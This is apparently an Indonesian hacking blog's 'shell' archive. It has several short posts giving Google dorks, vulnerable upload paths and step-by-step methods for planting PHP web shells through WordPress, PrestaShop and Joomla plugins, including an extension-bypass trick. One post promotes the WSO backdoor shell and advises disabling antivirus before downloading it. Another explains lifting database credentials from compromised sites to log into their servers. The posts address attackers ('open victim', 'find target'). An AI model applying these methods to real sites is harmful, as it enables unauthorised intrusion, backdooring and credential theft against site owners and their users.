Showing posts with label shell. Show all posts
Showing posts with label shell. Show all posts
Thursday, February 23, 2017
WordPress Plugins WP Mobile Detector Shell Upload Vulnerability
WordPress Plugins WP Mobile Detector Shell Upload Vulnerability

#- Title: WordPress Plugins WP Mobile Detector Shell Upload Vulnerability
#- Author: aaditya purani
#- Date: 2016/06/03
#- Developer : Jesse Friedman
#- Link Download : wordpress. org/plugins/wp-mobile-detector
#- Google Dork: inurl:"/plugins/wp-mobile-detector/"
#- Fixed in Version : 3.6 / Fixed exploit with resize script.
#- Tested on : windows
=======================================================
-- Proof Of Concept --
Description :
Kelemahan ini telah terpecahkan untuk publik yaitu WP Mobile Detector Arbitrary File upload untuk versi 3.5. Dimana seorang attacker dapat mengupload Malicious File / shell ke dalam sebuah website. Lebih dari 10.000 website terinfeksi bug ini. Tetapi vendor sudah merilis patch terbaru dari versi ini aitu versi 3.6 dan versi 3.7. Bahkan Securi sudah mempublikasikan kerentanan ini.
Vulnerability : site/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php]
Method :
1. Cari Target.
2. Target/wp-content/plugins/wp-mobile-detector/resize.php?src=Link Shell Kamu3. Jika berhasil maka shell tersebut akan tersimpan di dir /cache/
Format Shell > php
Need Shell Path ? Click Here
Available link for download
Wordpress Plugins impact template editor KCFinder Shell Upload
Wordpress Plugins impact template editor KCFinder Shell Upload

#- Title: Wordpress Plugins impact-template-editor KCFinder Shell Upload
#- Author: Putra Attacker
#- Date: -
#- Developer : WPEka Club
#- Link Download : wordpress. org/plugins/impact-template-editor/
#- Google Dork: inurl:"/plugins/impact-template-editor/"
#- Fixed in Version : -
#- Tested on : win
=======================================================
-- Proof Of Concept --
Vulnerable : /wp-content/plugins/impact-template-editor/lib/kcfinder/browse.php
When Vuln : Like a Kcfinder.
Methode :
1. Upload Your Shell, Php extension not allowed, so u can upload your shell with extension .php.asp / .php.pler
2. if Succesfully uploaded. find your shell.
Example :
browser.uploadURL = "/upload";
browser.dir = "impact";
See.. you can find your shell in Here
Available link for download
Wednesday, February 8, 2017
Shell WSO 3 0 Flat Design With Boostrap
Shell WSO 3 0 Flat Design With Boostrap

Shell WSO 3.0 Flat Design With Boostrap
# Title : Shell WSO 3.0 Flat Design With Boostrap
# Coded by : Antidote
# Contact : twitter .com/coderantidote
# Type : PHP
Deskripsi :
Di Tahun 2016 ini flat design sangat di gandrungi oleh banyak orang baik dibidang IT/Arsitektur/Design. Flat design ini sepertinya di populerkan oleh Google lalu menjadi sebuah viral design. Banyak yang suka & menerima design flat ini karena jika dilihat secara warna, warna yang digunakan sangat adem untuk dipandang.
Dari Sisi dunia persilatan ini juga tidak mau kalah saing dengan unsur lainnya. Mulai dari sebuah senjata backdoor yang awalnya terlihat seram dengan warna pokok hitam, hijau, kuning berubah menjadi warna yang cerah dan enak untuk dipandang. Ini lah Shell WSO 3.0 Flat Design With Boostrap
Salah satu isi line di script :
*Matikan Antivirus / Turn Off Your Antivirus Before Download this Script
Penasaran ? Download Script Here !
Deskripsi :
Di Tahun 2016 ini flat design sangat di gandrungi oleh banyak orang baik dibidang IT/Arsitektur/Design. Flat design ini sepertinya di populerkan oleh Google lalu menjadi sebuah viral design. Banyak yang suka & menerima design flat ini karena jika dilihat secara warna, warna yang digunakan sangat adem untuk dipandang.
Dari Sisi dunia persilatan ini juga tidak mau kalah saing dengan unsur lainnya. Mulai dari sebuah senjata backdoor yang awalnya terlihat seram dengan warna pokok hitam, hijau, kuning berubah menjadi warna yang cerah dan enak untuk dipandang. Ini lah Shell WSO 3.0 Flat Design With Boostrap
Salah satu isi line di script :
<title>Wso ".WSO_VERSION." Shell</title>
<meta name=viewport content=width=device-width, initial-scale=1>
<meta name=viewport content=width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no>
<link rel=stylesheet href=https://bootswatch.com/superhero/bootstrap.min.css>
<link href=https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css rel=stylesheet>
Penasaran ? Download Script Here !
Available link for download
Tuesday, January 31, 2017
Cara Mendapatkan VPS Gratis Dari Shell
Cara Mendapatkan VPS Gratis Dari Shell

Cara Mendapatkan VPS Gratis Dari Shell - Kali ini saya akan berbagi trik yaitu Cara Mendapatkan VPS Gratis Dari Shell. Vps itu untuk apa sih ? kalo disebutin sih banyak sekali kegunaannya. Dulu saya pernah manfaatin vps untuk ngeboost traffick website haha.. Pokoknya enak lah kalo dapet vps. Balik lagi, cara mendapatkannya ? Untuk mendapatkan dengan teknik ini yang pertama kali kamu harus pelajarin adalah, pelajarin ilmu pepes dulu. Contoh Lihat ini
Metode ini bisa dijalankan jika sebuah website sudah tertanam shell, jadi kalo belum tertanam ya tanamin dulu. Gimana caranya ? ya pake teknik pepes lah. Langsung coeg no cing cong.
1. Siapkan Shell Lalu menuju ke config / konfiguration / db ( database )
Ambil datanya .

Disini kita hanya membutuhkan username dan password nya saja ya.
2. Setelah itu lakukan reverse ip pada webtersebut. bisa menggunaakan cmd / reverse di web
123.43.45.65 < contoh
3. Lalu buka PuTTy
4. Selanjutnya masukan server ip yang tadi
5. Lalu masukan user & passsword db tadi,
6. Dan lihat hasilnya

* Note
Tidak semua website bisa diambil vps nya lewat teknik ini, Setiap web mempunyai karakteristik & security masing masing. Semoga masih work dan berguna :D
Available link for download
Wednesday, January 25, 2017
Pretashop Blocktestimonial Upload Shell Vulnerability
Pretashop Blocktestimonial Upload Shell Vulnerability

#- Title: Pretashop Blocktestimonial Upload Shell Vulnerability
#- Author: Unknown ( Contact me, If Your are the author )
#- Published : 2015/04/
#- Developer : -
#- Link Download : prestashop.webindoshop.com/en/front-office-features/25-block-testimonial-module.html
#- Google Dork: inurl:"/modules/blocktestimonial/"
#- Fixed in Version : -
#- Tested on : windows
=======================================================
-- Proof Of Concept --
Description :
With this module, your customers can easily submit testimony or expression of their satisfaction about products and services you have provided. Testimony or an expressions of customer satisfaction can attractively be displayed on the front page of your website, to increase the trust of visitors or other customers.
Vulnerability :
site /modules/blocktestimonial/addtestimonial.php
Tutorial :
1. Open victim
2. Add Site /modules/blocktestimonial/addtestimonial.php
3. fill in the registration & upload ypur shellIf Succesfully > Your Testimonial Has Been Sent
Shell Acces ? Click Here
Available link for download
Labels:
blocktestimonial,
pretashop,
shell,
upload,
vulnerability
Sunday, January 22, 2017
Joomla 2 5 Modules Simple Spotlight Upload Shell Old 3xploi7
Joomla 2 5 Modules Simple Spotlight Upload Shell Old 3xploi7

#- Title: Joomla 2.5 Modules Simple Spotlight Upload Shell
#- Author: BL4ckc0d1n6
#- Published : 3-22-2012
#- Developer : joomla
#- Link Download : extensions.joomla .org/extension/simple-spotlight
#- Price : Free
#- Google Dork: inurl:/modules/mod_ppc_simple_spotlight/
#- Google Dork: inurl:/modules/mod_ppc_simple_spotlight/
#- Fixed in Version : -
#- Tested on : windows
=======================================================
-- Proof Of Concept --
Description :
Simple spotlight is a jQuery image rotator with navigation. You can have up to 20 images with links. You can turn off the navigation and choose between 27 effects for transition. It also has 5 button styles and a shadow effect.
Vulnerability :
site/path/modules/mod_ppc_simple_spotlight/elements/upload_file.php
site/path/modules/mod_ppc_simple_spotlight/elements/upload_file.php
Result : 13k +
When Vuln :

iSource :
<script language="JavaScript">
function refreshParent() {
window.close();
if (window.opener && !window.opener.closed) {
window.opener.location.reload();
}
}
</script>
<form name="newad" method="post" enctype="multipart/form-data" action="">
<table>
<tr>
<td>
<input type="file" name="image">
</td>
</tr>
<tr>
<td>
<input name="Submit" type="submit" value="Upload image">
<input type="button" value="Close" onclick="javascript: refreshParent()">
</td>
</tr>
</table>
</form>
~ Method ~
1. Site .com
2. add 3xploi7 = /modules/mod_ppc_simple_spotlight/elements/upload_file.php
3. Ex : Site .com/modules/mod_ppc_simple_spotlight/elements/upload_file.php
4. Upload your shell / imges / html file
If Succesfully >


Shell Acces ? Click Here
Available link for download
Subscribe to:
Posts (Atom)